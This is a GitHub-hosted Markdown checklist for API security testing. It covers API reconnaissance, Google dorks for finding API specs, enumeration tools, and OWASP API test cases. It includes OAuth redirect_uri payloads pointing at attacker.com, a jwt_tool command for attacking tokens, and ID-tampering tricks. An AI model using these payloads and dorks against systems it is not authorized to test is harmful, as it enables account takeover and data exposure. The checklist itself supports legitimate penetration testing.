Skip to content

Latest commit

 

History

History
661 lines (538 loc) · 22.2 KB

MindAPI.md

File metadata and controls

661 lines (538 loc) · 22.2 KB

MindAPI

Reconnaissance

Identify architecture

Architecture

  • REST APIs
    • RESTful
      • URL structure
        • Often use resource-oriented URLs such as: /api/v1/product/1234
      • Response structure
        • Often in JSON or XML format
        • Consistent and hierarchical structure
    • OData
      • A metadata document is usually provided at /odata/$metadata
      • Specific query options present on the URL: /odata/Products?$filter=Price&$orderby=desc
      • Response often includes annotations @odata.context or @odata.metadata
      • Typically format is JSON
      • Usually the response Content-Type includes the string odata: application/json;odata.metadata=full
  • GraphQL
    • Response structure
      • If there an issue with the query, an errors object is included in the response
      • Errors like Cannot query field or Field <field_name> not found is usually indicative of a GraphQL API
      • If the response is successful the response will often contain a data field which includes the actual query results
    • Specific fields
      • Response may include __typename which is used to identify the type of an object
  • SOAP
    • Transfered data in XML format
  • XML-RPC
    • Transfered data in simpler XML format <users><user><firstName>David</firstName>
  • JSON-RPC
    • Transfered data similar to XML-RPC but in JSON format {"users":[{"firstName":"David"}]
  • gRPC-Protobuf
    • Identify grpc
      • Accept request header
      • Content-Type request header
      • Access-control-expose-headers in the response header
    • gRPC messages are encoded using Protobuf, which is binary
  • Webhooks
    • Event-driven APIs that send information or perform a specific function in response to a trigger (e.g. time of the day, clicking a button, receiving a form submission)
      • Identify
        • Search for webhooks or event subscriptions on the documentation
        • Find a reference on how to register a callback URL
        • Is there a list of events types that can trigger a webhook?

Documentation

Check for documentation

Automatic

Swagger
OData
  • /$metadata
WADL
  • /application.wadl
  • /application.wadl?detail=true
  • /api/application.wadl
WSDL
GraphQL

Manual

  • site:target.tld intitle:api | developer

Search for APIs

Traffic Analysis

Android apps

Wayback Machine

Path Manipulation

  • /api/v1/
  • /api/v2/
  • /api/v3/
  • /api/
  • /api/private
  • /api/partner
  • /api/test
  • api.target.com/v1
  • api.target.com/v2
  • api.target.com/v3

Key/Token identification/Testing

Dorks

Google
  • site:target.tld inurl:api
  • intitle:"index of" "api.yaml" site:target.tld
  • REST
    • site:target.tld inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
  • GraphQL
    • site:target.tld inurl:graphql
  • WADL
    • inurl:/application.wadl
    • user filetype:wadl
    • ext:wadl
  • WSDL
    • user filetype:wsdl
    • ext:wsdl
  • Odata
    • inurl:/%24metadata
  • Webhooks
    • inurl:docs webhook
Github

Secrets

API Directories

Enumerate endpoints / methods

Endpoints

GraphQL
Swagger
Other
WADL

Tools

ffuf
Amass
nuclei
Jaeles
Arjun
ParamSpider
param-miner
TnT-Fuzzer
Kiterunner
graphw00f
clairvoyance
json2paths
feroxbuster
wfuzz
ReconAIzer
JS Miner
GoBuster
katana
Sasori

Supported Content Types

  • Play with request URL
    • Requested resource extension e.g. replacing .json by .xml
    • Query string e.g. replacing ?json by ?xml or ?format=json by ?format=xml
  • Play with Content-Type request header and payload
    • Without Content-Type, submit either json, xml, ...
    • Changing Content-Type and payload accordingly

Testing

Broken Object Level Authorization

Endpoint receives an ID?

Understand the pattern
  • Sequential
  • Encoded
  • UUID (aka GUID)
  • Composite IDs
  • Hashed
  • Randomly Generated Strings
  • Temporal
Tamper
Change
  • Next/Previous value
  • Compute/Predict (e.g. UUIDv1)
  • Data Type
    • Is it a number? Change it to a string
    • Is it a string? Change it to a number
  • Method
    • GET to POST
    • GET to PUT
    • GET to PATCH
  • Base64 encoded?
    • Decoded it, modify it, encode it again
Duplicate
  • ?id=1&id=2
Add as an array
  • ?id[]=1&id[]=2
Wildcard
  • GET /users/id -> GET /users/*
Cross-deployments IDs
  • Identify other deployments (hosts) of your target API
  • Enumerate resources IDs (often non- numerical/sequential ones)
  • Test those IDs on your target API host

Check the response

Tools

Broken Authentication

Test

URL sensitive data
  • Passwords
  • Tokens
Brute force attacks
  • Login
  • Forget Password
  • Forget Username
Authenticity of tokens
Password
Strength
  • Changing Password
  • Registration
Type
  • Plain text
  • Weak encryption
  • Weak hash algorithm
API Keys
  • Predictable
  • Weak hash algorithm

Types of Authentication

JWT
Multiple JWT test cases
  • jwt_tool
    • python3 jwt_tool.py -t https://api.example.com/api/working_endpoint -rh "Content-Type: application/json" -rh "Authorization: Bearer [JWT]" -M at
    • https://github.com/ticarpi/jwt_tool
Test JWT secret brute-forcing
Abusing JWT Public Keys Without knowing the Public Key
Test if algorithm could be changed
Test if signature is being validated
Test token expiration time (TTL, RTTL)
Test if sensitive data is in the JWT
Check for Injection in "kid" element
Check for time constant verification for HMAC
Check that keys and secrets are different between ENV
OAuth
  • Test redirect_uri
    • Open redirects
      • Common issues
        • ?redirect_uri=https://atttacker.com
        • ?redirect_uri=https://ATTACKER.TARGET.TLD
        • ?redirect_uri=https://ALLOWED_HOST.com/callback?redirectUrl=https://attacker.com
        • ?redirect_uri=https://TARGET.TLD.attacker.com
        • ?redirect_uri=https://TARGET.TLD%252eattacker.com
        • ?redirect_uri=https://TARGET.TLD//attacker.com/
      • Fuzz
    • XSS
  • Test the existence of response_type=token
  • Testing state
    • Missing state parameter?
      • CSRF
        • Generate a valid authorization_code and don't use it
          • Send the crafted CSRF page to TARGET
    • Predictable state parameter?
    • Is state parameter being verified?
  • If you revocate access, will code be also revocated?
  • Credential leakage
    • Check the Referer header
    • Check the browser history
Basic Auth

Excessive Data Exposure

Check if the API returns full data objects from database with sensitive data

Compare client data with the API response to check if the filtering is done by client side

Sniff the traffic to check for sensitive data returned by the API

Lack of Resources & Rate Limiting

Execution timeouts

Test brute-force attacks

Max allocable memory

Number of file descriptors

Number of processes

Request payload size (e.g. uploads)

Number of requests per client/resource

Number of records per page to return in a single request response

Broken Function Level Authorization

  • Can a regular user access administrative endpoints? (MindAPI recon can help you here)
  • Testing different HTTP methods (GET, POST, PUT, DELETE, PATCH) will allow level escalation?
  • Enumerate/Bruteforce endpoints for getting unauthorized requests (MindAPI recon can help you here)

Mass Assignment

Enumerate object properties

  • API documentation (Reconnaissance)
  • Inspect available API clients' network traffic
    • Desktop
    • Mobile
    • Web
  • Exercise data retrieval endpoints
    • watch-out for ?include=user.addresses,user.cards-like parameters
  • Uncover hidden properties
    • Guessing, based on API context
    • Reverse engineering available API clients
    • Fuzzing

Craft request payloads

  • Include augmented objects
    • One additional property at a time
    • Possible combinations of properties
    • All enumerated properties at once
  • Vary properties data types/values
    • Number, String, Array, Object
    • State values: to-do -> in-progress -> done (keep in mind possible state transitions)
  • Test different operation types
    • Create
    • Update

Security Misconfiguration

The latest security patches are missing, or the systems are out of date.

Can you use other HTTP verbs?

Test if Transport Layer Security (TLS) is missing

Test for security headers

CORS is well configured?

  • Astra
  • API Fuzzer
  • Test Same Origin Policy (SOP): Modify the value of the Origin request header to reflect a different or seemingly untrusted website, and verify if the request is successfully processed

Force an error to see if any sensitive information is exposed

GraphQL

Injection

Test if user input is validated, filtered, or sanitized by the API

Test if client data is used or concat into DB queries, OS commands, etc

Check if incoming data from external systems is validated, filtered, or sanitized by the API

Improper Assets Management

  • Check for the API documentation (MindAPI recon can help you here)
  • Hosts inventory is missing or outdated.
  • Integrated services inventory, either first- or third-party, is missing or outdated.
  • Old or previous API versions are running unpatched.
  • The aspects of the API (e.g. name, purpose, owner, description, authentication, endpoints, versioning, redirects, errors, parameters, rate-limiting, request and response formats, etc) are missing or outdated.
  • If the API documentation is exposed to the internet, implement an access control mechanism (e.g. login portal) to ensure that only authorized users access the OpenAPI specification or even to the documentation as a whole.
  • If your API shares data with a third-party or you are consuming a third-party API, make sure to include it in the inventory.

API Testing tools